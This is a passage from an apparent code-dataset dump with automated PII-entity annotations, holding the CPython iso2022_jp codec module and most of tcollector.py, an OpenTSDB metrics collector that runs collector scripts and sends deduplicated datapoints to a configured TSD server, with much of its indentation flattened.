'50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 
'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.re'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.re'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com']] |
13 | #
# iso2022_jp.py: Python Unicode Codec for ISO2022_JP
#
# Written by Hye-Shik Chang dummy@email.com
#
import _codecs_iso2022, codecs
import _multibytecodec as mbc
codec = _codecs_iso2022.getcodec('iso2022_jp')
class Codec(codecs.Codec):
    encode = codec.encode
    decode = codec.decode
class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,
                         codecs.IncrementalEncoder):
    codec = codec
class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,
                         codecs.IncrementalDecoder):
    codec = codec
class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):
    codec = codec
class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):
    codec = codec
def getregentry():
    return codecs.CodecInfo(
        name='iso2022_jp',
        encode=Codec().encode,
        decode=Codec().decode,
        incrementalencoder=IncrementalEncoder,
        incrementaldecoder=IncrementalDecoder,
        streamreader=StreamReader,
        streamwriter=StreamWriter,
    )
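# Minimal usage sketch (assumes the codec is registered via the standard
# `encodings` package, as in CPython):
#   framed = u'\u3042'.encode('iso2022_jp')   # ESC-framed JIS bytes
#   assert framed.decode('iso2022_jp') == u'\u3042'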
| 3,219 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Hye-Shik Chang'], ['LOCATION', 'multibytecodec'], ['NRP', 'IncrementalEncoder(mbc'], ['PERSON', 'StreamWriter'], ['LOCATION', 'streamwriter'], ['PERSON', 'Hye-Shik Chang'], ['LOCATION', 'multibytecodec'], ['NRP', 'IncrementalEncoder(mbc'], ['PERSON', 'StreamWriter'], ['LOCATION', 'streamwriter'], ['PERSON', 'Hye-Shik Chang'], ['LOCATION', 'multibytecodec'], ['NRP', 'IncrementalEncoder(mbc'], ['PERSON', 'StreamWriter'], ['LOCATION', 'streamwriter'], ['URL', 'jp.py'], ['URL', 'email.com'], ['URL', 'iso2022.ge'], ['URL', 'codecs.Co'], ['URL', 'codec.de'], ['URL', 'mbc.Mu'], ['URL', 'codecs.In'], ['URL', 'mbc.Mu'], ['URL', 'codecs.In'], ['URL', 'mbc.Mu'], ['URL', 'codecs.St'], ['URL', 'mbc.Mu'], ['URL', 'codecs.St'], ['URL', 'codecs.Co'], ['URL', 'jp.py'], ['URL', 'email.com'], ['URL', 'iso2022.ge'], ['URL', 'codecs.Co'], ['URL', 'codec.de'], ['URL', 'mbc.Mu'], ['URL', 'codecs.In'], ['URL', 'mbc.Mu'], ['URL', 'codecs.In'], ['URL', 'mbc.Mu'], ['URL', 'codecs.St'], ['URL', 'mbc.Mu'], ['URL', 'codecs.St'], ['URL', 'codecs.Co'], ['URL', 'jp.py'], ['URL', 'email.com'], ['URL', 'iso2022.ge'], ['URL', 'codecs.Co'], ['URL', 'codec.de'], ['URL', 'mbc.Mu'], ['URL', 'codecs.In'], ['URL', 'mbc.Mu'], ['URL', 'codecs.In'], ['URL', 'mbc.Mu'], ['URL', 'codecs.St'], ['URL', 'mbc.Mu'], ['URL', 'codecs.St'], ['URL', 'codecs.Co']] |
14 | #!/usr/bin/env python
# This file is part of tcollector.
# Copyright (C) 2010 The tcollector Authors.
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or (at your
# option) any later version. This program is distributed in the hope that it
# will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty
# of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser
# General Public License for more details. You should have received a copy
# of the GNU Lesser General Public License along with this program. If not,
# see <http://www.gnu.org/licenses/>.
#
# tcollector.py
#
"""Simple manager for collection scripts that run and gather data.
The tcollector gathers the data and sends it to the TSD for storage."""
#
# by Mark Smith dummy@email.com.
#
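# Typical invocation (sketch; see parse_cmdline below for all flags,
# hostname is hypothetical):
#   ./tcollector.py -H tsd.example.com -p 4242 -t host=web1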
import atexit
import errno
import fcntl
import logging
import os
import random
import re
import signal
import socket
import subprocess
import sys
import threading
import time
import json
import urllib2
import base64
from logging.handlers import RotatingFileHandler
from Queue import Queue
from Queue import Empty
from Queue import Full
from optparse import OptionParser
# global variables.
COLLECTORS = {}
GENERATION = 0
DEFAULT_LOG = '/var/log/tcollector.log'
LOG = logging.getLogger('tcollector')
ALIVE = True
# If the SenderThread catches more than this many consecutive uncaught
# exceptions, something is not right and tcollector will shut down.
# Hopefully some kind of supervising daemon will then restart it.
MAX_UNCAUGHT_EXCEPTIONS = 100
DEFAULT_PORT = 4242
MAX_REASONABLE_TIMESTAMP = 1600000000 # Good until September 2020 :)
# How long to wait for datapoints before assuming
# a collector is dead and restarting it
ALLOWED_INACTIVITY_TIME = 600 # seconds
MAX_SENDQ_SIZE = 10000
MAX_READQ_SIZE = 100000
def register_collector(collector):
"""Register a collector with the COLLECTORS global"""
assert isinstance(collector, Collector), "collector=%r" % (collector,)
# store it in the global list and initiate a kill for anybody with the
# same name that happens to still be hanging around
if collector.name in COLLECTORS:
col = COLLECTORS[collector.name]
if col.proc is not None:
LOG.error('%s still has a process (pid=%d) and is being reset,'
' terminating', col.name, col.proc.pid)
col.shutdown()
COLLECTORS[collector.name] = collector
class ReaderQueue(Queue):
"""A Queue for the reader thread"""
def nput(self, value):
"""A nonblocking put, that simply logs and discards the value when the
queue is full, and returns false if we dropped."""
try:
self.put(value, False)
except Full:
LOG.error("DROPPED LINE: %s", value)
return False
return True
class Collector(object):
"""A Collector is a script that is run that gathers some data
and prints it out in standard TSD format on STDOUT. This
class maintains all of the state information for a given
collector and gives us utility methods for working with
it."""
def __init__(self, colname, interval, filename, mtime=0, lastspawn=0):
"""Construct a new Collector."""
self.name = colname
self.interval = interval
self.filename = filename
self.lastspawn = lastspawn
self.proc = None
self.nextkill = 0
self.killstate = 0
self.dead = False
self.mtime = mtime
self.generation = GENERATION
self.buffer = ""
self.datalines = []
# Maps (metric, tags) to (value, repeated, line, timestamp) where:
# value: Last value seen.
# repeated: boolean, whether the last value was seen more than once.
# line: The last line that was read from that collector.
# timestamp: Time at which we saw the value for the first time.
# This dict is used to keep track of and remove duplicate values.
# Since it might grow unbounded (in case we see many different
# combinations of metrics and tags) someone needs to regularly call
# evict_old_keys() to remove old entries.
self.values = {}
self.lines_sent = 0
self.lines_received = 0
self.lines_invalid = 0
self.last_datapoint = int(time.time())
def read(self):
"""Read bytes from our subprocess and store them in our temporary
line storage buffer. This needs to be non-blocking."""
# now read stderr for log messages, we could buffer here but since
# we're just logging the messages, I don't care to
try:
out = self.proc.stderr.read()
if out:
LOG.debug('reading %s got %d bytes on stderr',
self.name, len(out))
for line in out.splitlines():
LOG.warning('%s: %s', self.name, line)
except IOError, (err, msg):
if err != errno.EAGAIN:
raise
except:
LOG.exception('uncaught exception in stderr read')
# we have to use a buffer because sometimes the collectors will write
# out a bunch of data points at one time and we get some weird sized
# chunk. This read call is non-blocking.
try:
self.buffer += self.proc.stdout.read()
if len(self.buffer):
LOG.debug('reading %s, buffer now %d bytes',
self.name, len(self.buffer))
except IOError, (err, msg):
if err != errno.EAGAIN:
raise
except AttributeError:
# sometimes the process goes away in another thread and we don't
# have it anymore, so log an error and bail
LOG.exception('caught exception, collector process went away while reading stdout')
except:
LOG.exception('uncaught exception in stdout read')
return
# iterate for each line we have
while self.buffer:
idx = self.buffer.find('\n')
if idx == -1:
break
# one full line is now found and we can pull it out of the buffer
line = self.buffer[0:idx].strip()
if line:
self.datalines.append(line)
self.last_datapoint = int(time.time())
self.buffer = self.buffer[idx+1:]
def collect(self):
"""Reads input from the collector and returns the lines up to whomever
is calling us. This is a generator that returns a line as it
becomes available."""
while self.proc is not None:
self.read()
if not len(self.datalines):
return
while len(self.datalines):
yield self.datalines.pop(0)
def shutdown(self):
"""Cleanly shut down the collector"""
if not self.proc:
return
try:
if self.proc.poll() is None:
kill(self.proc)
for attempt in range(5):
if self.proc.poll() is not None:
return
                    LOG.info('Waiting %ds for PID %d (%s) to exit...',
                             5 - attempt, self.proc.pid, self.name)
time.sleep(1)
kill(self.proc, signal.SIGKILL)
self.proc.wait()
except:
# we really don't want to die as we're trying to exit gracefully
LOG.exception('ignoring uncaught exception while shutting down')
def evict_old_keys(self, cut_off):
"""Remove old entries from the cache used to detect duplicate values.
Args:
cut_off: A UNIX timestamp. Any value that's older than this will be
removed from the cache.
"""
for key in self.values.keys():
time = self.values[key][3]
if time < cut_off:
del self.values[key]
class StdinCollector(Collector):
"""A StdinCollector simply reads from STDIN and provides the
data. This collector presents a uniform interface for the
ReaderThread, although unlike a normal collector, read()/collect()
will be blocking."""
def __init__(self):
super(StdinCollector, self).__init__('stdin', 0, '<stdin>')
# hack to make this work. nobody else will rely on self.proc
# except as a test in the stdin mode.
self.proc = True
def read(self):
"""Read lines from STDIN and store them. We allow this to
be blocking because there should only ever be one
StdinCollector and no normal collectors, so the ReaderThread
is only serving us and we're allowed to block it."""
global ALIVE
line = sys.stdin.readline()
if line:
self.datalines.append(line.rstrip())
else:
ALIVE = False
def shutdown(self):
pass
class ReaderThread(threading.Thread):
"""The main ReaderThread is responsible for reading from the collectors
and assuring that we always read from the input no matter what.
All data read is put into the self.readerq Queue, which is
consumed by the SenderThread."""
def __init__(self, dedupinterval, evictinterval):
"""Constructor.
Args:
dedupinterval: If a metric sends the same value over successive
intervals, suppress sending the same value to the TSD until
this many seconds have elapsed. This helps graphs over narrow
time ranges still see timeseries with suppressed datapoints.
evictinterval: In order to implement the behavior above, the
code needs to keep track of the last value seen for each
combination of (metric, tags). Values older than
evictinterval will be removed from the cache to save RAM.
Invariant: evictinterval > dedupinterval
"""
assert evictinterval > dedupinterval, "%r <= %r" % (evictinterval,
dedupinterval)
super(ReaderThread, self).__init__()
self.readerq = ReaderQueue(MAX_READQ_SIZE)
self.lines_collected = 0
self.lines_dropped = 0
self.dedupinterval = dedupinterval
self.evictinterval = evictinterval
def run(self):
"""Main loop for this thread. Just reads from collectors,
does our input processing and de-duping, and puts the data
into the queue."""
LOG.debug("ReaderThread up and running")
lastevict_time = 0
        # we loop every second for now. ideally we'll set up some
        # select or other thing to wait for input on our children,
        # while breaking out every once in a while to set up selects
        # on new children.
while ALIVE:
for col in all_living_collectors():
for line in col.collect():
self.process_line(col, line)
if self.dedupinterval != 0: # if 0 we do not use dedup
now = int(time.time())
if now - lastevict_time > self.evictinterval:
lastevict_time = now
now -= self.evictinterval
for col in all_collectors():
col.evict_old_keys(now)
# and here is the loop that we really should get rid of, this
# just prevents us from spinning right now
time.sleep(1)
def process_line(self, col, line):
"""Parses the given line and appends the result to the reader queue."""
self.lines_collected += 1
col.lines_received += 1
if len(line) >= 1024: # Limit in net.opentsdb.tsd.PipelineFactory
LOG.warning('%s line too long: %s', col.name, line)
col.lines_invalid += 1
return
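        # One datapoint per line in the standard telnet-style format, e.g.:
        #   proc.loadavg.1min 1288946927 0.36 host=web1
        # i.e. "<metric> <epoch-timestamp> <value> [<tag>=<value> ...]"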
parsed = re.match('^([-_./a-zA-Z0-9]+)\s+' # Metric name.
'(\d+\.?\d+)\s+' # Timestamp.
'(\S+?)' # Value (int or float).
'((?:\s+[-_./a-zA-Z0-9]+=[-_./a-zA-Z0-9]+)*)$', # Tags
line)
if parsed is None:
LOG.warning('%s sent invalid data: %s', col.name, line)
col.lines_invalid += 1
return
metric, timestamp, value, tags = parsed.groups()
timestamp = int(timestamp)
# If there are more than 11 digits we're dealing with a timestamp
# with millisecond precision
if len(str(timestamp)) > 11:
global MAX_REASONABLE_TIMESTAMP
MAX_REASONABLE_TIMESTAMP = MAX_REASONABLE_TIMESTAMP * 1000
# De-dupe detection... To reduce the number of points we send to the
# TSD, we suppress sending values of metrics that don't change to
# only once every 10 minutes (which is also when TSD changes rows
# and how much extra time the scanner adds to the beginning/end of a
# graph interval in order to correctly calculate aggregated values).
# When the values do change, we want to first send the previous value
# with what the timestamp was when it first became that value (to keep
# slopes of graphs correct).
#
if self.dedupinterval != 0: # if 0 we do not use dedup
key = (metric, tags)
if key in col.values:
# if the timestamp isn't > than the previous one, ignore this value
if timestamp <= col.values[key][3]:
LOG.error("Timestamp out of order: metric=%s%s,"
" old_ts=%d >= new_ts=%d - ignoring data point"
" (value=%r, collector=%s)", metric, tags,
col.values[key][3], timestamp, value, col.name)
col.lines_invalid += 1
return
elif timestamp >= MAX_REASONABLE_TIMESTAMP:
LOG.error("Timestamp is too far out in the future: metric=%s%s"
" old_ts=%d, new_ts=%d - ignoring data point"
" (value=%r, collector=%s)", metric, tags,
col.values[key][3], timestamp, value, col.name)
return
# if this data point is repeated, store it but don't send.
# store the previous timestamp, so when/if this value changes
# we send the timestamp when this metric first became the current
# value instead of the last. Fall through if we reach
# the dedup interval so we can print the value.
if (col.values[key][0] == value and
(timestamp - col.values[key][3] < self.dedupinterval)):
col.values[key] = (value, True, line, col.values[key][3])
return
# we might have to append two lines if the value has been the same
# for a while and we've skipped one or more values. we need to
# replay the last value we skipped (if changed) so the jumps in
# our graph are accurate,
if ((col.values[key][1] or
(timestamp - col.values[key][3] >= self.dedupinterval))
and col.values[key][0] != value):
col.lines_sent += 1
if not self.readerq.nput(col.values[key][2]):
self.lines_dropped += 1
# now we can reset for the next pass and send the line we actually
# want to send
# col.values is a dict of tuples, with the key being the metric and
# tags (essentially the same as wthat TSD uses for the row key).
# The array consists of:
# [ the metric's value, if this value was repeated, the line of data,
# the value's timestamp that it last changed ]
col.values[key] = (value, False, line, timestamp)
col.lines_sent += 1
if not self.readerq.nput(line):
self.lines_dropped += 1
class SenderThread(threading.Thread):
"""The SenderThread is responsible for maintaining a connection
to the TSD and sending the data we're getting over to it. This
thread is also responsible for doing any sort of emergency
buffering we might need to do if we can't establish a connection
and we need to spool to disk. That isn't implemented yet."""
def __init__(self, reader, dryrun, hosts, self_report_stats, tags,
reconnectinterval=0, http=False, http_username=None,
http_password=None, ssl=False, maxtags=8):
"""Constructor.
Args:
reader: A reference to a ReaderThread instance.
dryrun: If true, data points will be printed on stdout instead of
being sent to the TSD.
hosts: List of (host, port) tuples defining list of TSDs
self_report_stats: If true, the reader thread will insert its own
stats into the metrics reported to TSD, as if those metrics had
been read from a collector.
http: A boolean that controls whether or not the http endpoint is used.
ssl: A boolean that controls whether or not the http endpoint uses ssl.
tags: A dictionary of tags to append for every data point.
"""
super(SenderThread, self).__init__()
self.dryrun = dryrun
self.reader = reader
self.tags = sorted(tags.items()) # dictionary transformed to list
self.http = http
self.http_username = http_username
self.http_password = http_password
self.ssl = ssl
self.hosts = hosts # A list of (host, port) pairs.
# Randomize hosts to help even out the load.
random.shuffle(self.hosts)
self.blacklisted_hosts = set() # The 'bad' (host, port) pairs.
self.current_tsd = -1 # Index in self.hosts where we're at.
self.host = None # The current TSD host we've selected.
self.port = None # The port of the current TSD.
self.tsd = None # The socket connected to the aforementioned TSD.
self.last_verify = 0
self.reconnectinterval = reconnectinterval # in seconds.
self.time_reconnect = 0 # if reconnectinterval > 0, used to track the time.
self.sendq = []
self.self_report_stats = self_report_stats
self.maxtags = maxtags # The maximum number of tags TSD will accept.
def pick_connection(self):
"""Picks up a random host/port connection."""
# Try to get the next host from the list, until we find a host that
# isn't in the blacklist, or until we run out of hosts (i.e. they
# are all blacklisted, which typically happens when we lost our
# connectivity to the outside world).
for self.current_tsd in xrange(self.current_tsd + 1, len(self.hosts)):
hostport = self.hosts[self.current_tsd]
if hostport not in self.blacklisted_hosts:
break
else:
LOG.info('No more healthy hosts, retry with previously blacklisted')
random.shuffle(self.hosts)
self.blacklisted_hosts.clear()
self.current_tsd = 0
hostport = self.hosts[self.current_tsd]
self.host, self.port = hostport
LOG.info('Selected connection: %s:%d', self.host, self.port)
def blacklist_connection(self):
"""Marks the current TSD host we're trying to use as blacklisted.
Blacklisted hosts will get another chance to be elected once there
will be no more healthy hosts."""
# FIXME: Enhance this naive strategy.
LOG.info('Blacklisting %s:%s for a while', self.host, self.port)
self.blacklisted_hosts.add((self.host, self.port))
def run(self):
"""Main loop. A simple scheduler. Loop waiting for 5
seconds for data on the queue. If there's no data, just
loop and make sure our connection is still open. If there
is data, wait 5 more seconds and grab all of the pending data and
send it. A little better than sending every line as its
own packet."""
errors = 0 # How many uncaught exceptions in a row we got.
while ALIVE:
try:
self.maintain_conn()
try:
line = self.reader.readerq.get(True, 5)
except Empty:
continue
self.sendq.append(line)
time.sleep(5) # Wait for more data
while True:
                    # prevent self.sendq from growing unboundedly when
                    # send_data() keeps failing
if len(self.sendq) > MAX_SENDQ_SIZE:
break
try:
line = self.reader.readerq.get(False)
except Empty:
break
self.sendq.append(line)
if ALIVE:
self.send_data()
errors = 0 # We managed to do a successful iteration.
except (ArithmeticError, EOFError, EnvironmentError, LookupError,
ValueError), e:
errors += 1
if errors > MAX_UNCAUGHT_EXCEPTIONS:
shutdown()
raise
LOG.exception('Uncaught exception in SenderThread, ignoring')
time.sleep(1)
continue
except:
LOG.exception('Uncaught exception in SenderThread, going to exit')
shutdown()
raise
def verify_conn(self):
"""Periodically verify that our connection to the TSD is OK
and that the TSD is alive/working."""
# http connections don't need this
if self.http:
return True
if self.tsd is None:
return False
# if the last verification was less than a minute ago, don't re-verify
if self.last_verify > time.time() - 60:
return True
# in case reconnect is activated, check if it's time to reconnect
if self.reconnectinterval > 0 and self.time_reconnect < time.time() - self.reconnectinterval:
# closing the connection and indicating that we need to reconnect.
try:
self.tsd.close()
except socket.error, msg:
pass # not handling that
self.time_reconnect = time.time()
return False
# we use the version command as it is very low effort for the TSD
# to respond
LOG.debug('verifying our TSD connection is alive')
try:
self.tsd.sendall('version\n')
except socket.error, msg:
self.tsd = None
self.blacklist_connection()
return False
bufsize = 4096
while ALIVE:
# try to read as much data as we can. at some point this is going
# to block, but we have set the timeout low when we made the
# connection
try:
buf = self.tsd.recv(bufsize)
except socket.error, msg:
self.tsd = None
self.blacklist_connection()
return False
# If we don't get a response to the `version' request, the TSD
# must be dead or overloaded.
if not buf:
self.tsd = None
self.blacklist_connection()
return False
            # Whoa, the TSD has a lot of things to tell us... Let's make
# sure we read everything it sent us by looping once more.
if len(buf) == bufsize:
continue
# If everything is good, send out our meta stats. This
# helps to see what is going on with the tcollector.
# TODO need to fix this for http
if self.self_report_stats:
strs = [
('reader.lines_collected',
'', self.reader.lines_collected),
('reader.lines_dropped',
'', self.reader.lines_dropped)
]
for col in all_living_collectors():
strs.append(('collector.lines_sent', 'collector='
+ col.name, col.lines_sent))
strs.append(('collector.lines_received', 'collector='
+ col.name, col.lines_received))
strs.append(('collector.lines_invalid', 'collector='
+ col.name, col.lines_invalid))
ts = int(time.time())
strout = ["tcollector.%s %d %d %s"
% (x[0], ts, x[2], x[1]) for x in strs]
for string in strout:
self.sendq.append(string)
break # TSD is alive.
# if we get here, we assume the connection is good
self.last_verify = time.time()
return True
def maintain_conn(self):
"""Safely connect to the TSD and ensure that it's up and
running and that we're not talking to a ghost connection
(no response)."""
# dry runs and http are always good
if self.dryrun or self.http:
return
# connection didn't verify, so create a new one. we might be in
# this method for a long time while we sort this out.
try_delay = 1
while ALIVE:
if self.verify_conn():
return
# increase the try delay by some amount and some random value,
# in case the TSD is down for a while. delay at most
# approximately 10 minutes.
try_delay *= 1 + random.random()
if try_delay > 600:
try_delay *= 0.5
LOG.debug('SenderThread blocking %0.2f seconds', try_delay)
time.sleep(try_delay)
# Now actually try the connection.
self.pick_connection()
try:
addresses = socket.getaddrinfo(self.host, self.port,
socket.AF_UNSPEC,
socket.SOCK_STREAM, 0)
except socket.gaierror, e:
# Don't croak on transient DNS resolution issues.
if e[0] in (socket.EAI_AGAIN, socket.EAI_NONAME,
socket.EAI_NODATA):
LOG.debug('DNS resolution failure: %s: %s', self.host, e)
continue
raise
for family, socktype, proto, canonname, sockaddr in addresses:
try:
self.tsd = socket.socket(family, socktype, proto)
self.tsd.settimeout(15)
self.tsd.connect(sockaddr)
# if we get here it connected
                LOG.debug('Connection to %s was successful', sockaddr)
break
except socket.error, msg:
LOG.warning('Connection attempt failed to %s:%d: %s',
self.host, self.port, msg)
self.tsd.close()
self.tsd = None
if not self.tsd:
LOG.error('Failed to connect to %s:%d', self.host, self.port)
self.blacklist_connection()
def add_tags_to_line(self, line):
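        """Appends the globally-configured tags to a datapoint line unless a
        tag with the same name is already present; e.g. with tags
        [('host', 'web1')], 'foo 1 1' becomes 'foo 1 1 host=web1'."""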
for tag, value in self.tags:
if ' %s=' % tag not in line:
line += ' %s=%s' % (tag, value)
return line
def send_data(self):
"""Sends outstanding data in self.sendq to the TSD in one operation."""
if self.http:
return self.send_data_via_http()
# construct the output string
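        # Telnet-style wire format, one datapoint per line:
        #   put <metric> <timestamp> <value> [<tag>=<value> ...]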
out = ''
# in case of logging we use less efficient variant
if LOG.level == logging.DEBUG:
for line in self.sendq:
line = "put %s" % self.add_tags_to_line(line)
out += line + "\n"
LOG.debug('SENDING: %s', line)
else:
out = "".join("put %s\n" % self.add_tags_to_line(line) for line in self.sendq)
if not out:
LOG.debug('send_data no data?')
return
# try sending our data. if an exception occurs, just error and
# try sending again next time.
try:
if self.dryrun:
print out
else:
self.tsd.sendall(out)
self.sendq = []
except socket.error, msg:
LOG.error('failed to send data: %s', msg)
try:
self.tsd.close()
except socket.error:
pass
self.tsd = None
self.blacklist_connection()
# FIXME: we should be reading the result at some point to drain
# the packets out of the kernel's queue
def send_data_via_http(self):
"""Sends outstanding data in self.sendq to TSD in one HTTP API call."""
metrics = []
for line in self.sendq:
# print " %s" % line
parts = line.split(None, 3)
# not all metrics have metric-specific tags
if len(parts) == 4:
(metric, timestamp, value, raw_tags) = parts
else:
(metric, timestamp, value) = parts
raw_tags = ""
# process the tags
metric_tags = {}
for tag in raw_tags.strip().split():
(tag_key, tag_value) = tag.split("=", 1)
metric_tags[tag_key] = tag_value
metric_entry = {}
metric_entry["metric"] = metric
metric_entry["timestamp"] = long(timestamp)
metric_entry["value"] = float(value)
metric_entry["tags"] = dict(self.tags).copy()
if len(metric_tags) + len(metric_entry["tags"]) > self.maxtags:
                metric_tags_orig = set(metric_tags)
                # dicts can't be sliced; keep a deterministic subset of the
                # metric-specific tags so the total stays within self.maxtags
                keep = self.maxtags - len(metric_entry["tags"])
                subset_metric_keys = frozenset(sorted(metric_tags)[:keep])
                metric_tags = dict((k, v) for k, v in metric_tags.iteritems()
                                   if k in subset_metric_keys)
LOG.error("Exceeding maximum permitted metric tags - removing %s for metric %s",
str(metric_tags_orig - set(metric_tags)), metric)
metric_entry["tags"].update(metric_tags)
metrics.append(metric_entry)
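            # Each entry is shaped like (hypothetical values):
            #   {"metric": "sys.cpu.user", "timestamp": 1288946927,
            #    "value": 0.36, "tags": {"host": "web1"}}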
if self.dryrun:
print "Would have sent:\n%s" % json.dumps(metrics,
sort_keys=True,
indent=4)
return
self.pick_connection()
# print "Using server: %s:%s" % (self.host, self.port)
# url = "http://%s:%s/api/put?details" % (self.host, self.port)
# print "Url is %s" % url
LOG.debug("Sending metrics to http://%s:%s/api/put?details",
self.host, self.port)
if self.ssl:
protocol = "https"
else:
protocol = "http"
req = urllib2.Request("%s://%s:%s/api/put?details" % (
protocol, self.host, self.port))
if self.http_username and self.http_password:
req.add_header("Authorization", "Basic %s"
% base64.b64encode("%s:%s" % (self.http_username, self.http_password)))
req.add_header("Content-Type", "application/json")
try:
response = urllib2.urlopen(req, json.dumps(metrics))
LOG.debug("Received response %s", response.getcode())
# clear out the sendq
self.sendq = []
# print "Got response code: %s" % response.getcode()
# print "Content:"
# for line in response:
# print line,
# print
except urllib2.HTTPError, e:
LOG.error("Got error %s", e)
# for line in http_error:
# print line,
def setup_logging(logfile=DEFAULT_LOG, max_bytes=None, backup_count=None):
"""Sets up logging and associated handlers."""
LOG.setLevel(logging.INFO)
if backup_count is not None and max_bytes is not None:
assert backup_count > 0
assert max_bytes > 0
ch = RotatingFileHandler(logfile, 'a', max_bytes, backup_count)
else: # Setup stream handler.
ch = logging.StreamHandler(sys.stdout)
ch.setFormatter(logging.Formatter('%(asctime)s %(name)s[%(process)d] '
'%(levelname)s: %(message)s'))
LOG.addHandler(ch)
def parse_cmdline(argv):
"""Parses the command-line."""
# get arguments
default_cdir = os.path.join(os.path.dirname(os.path.realpath(sys.argv[0])),
'collectors')
parser = OptionParser(description='Manages collectors which gather '
'data and report back.')
parser.add_option('-c', '--collector-dir', dest='cdir', metavar='DIR',
default=default_cdir,
help='Directory where the collectors are located.')
parser.add_option('-d', '--dry-run', dest='dryrun', action='store_true',
default=False,
help='Don\'t actually send anything to the TSD, '
'just print the datapoints.')
parser.add_option('-D', '--daemonize', dest='daemonize', action='store_true',
default=False, help='Run as a background daemon.')
parser.add_option('-H', '--host', dest='host', default='localhost',
metavar='HOST',
help='Hostname to use to connect to the TSD.')
parser.add_option('-L', '--hosts-list', dest='hosts', default=False,
metavar='HOSTS',
help='List of host:port to connect to tsd\'s (comma separated).')
parser.add_option('--no-tcollector-stats', dest='no_tcollector_stats',
default=False, action='store_true',
help='Prevent tcollector from reporting its own stats to TSD')
parser.add_option('-s', '--stdin', dest='stdin', action='store_true',
default=False,
help='Run once, read and dedup data points from stdin.')
parser.add_option('-p', '--port', dest='port', type='int',
default=DEFAULT_PORT, metavar='PORT',
help='Port to connect to the TSD instance on. '
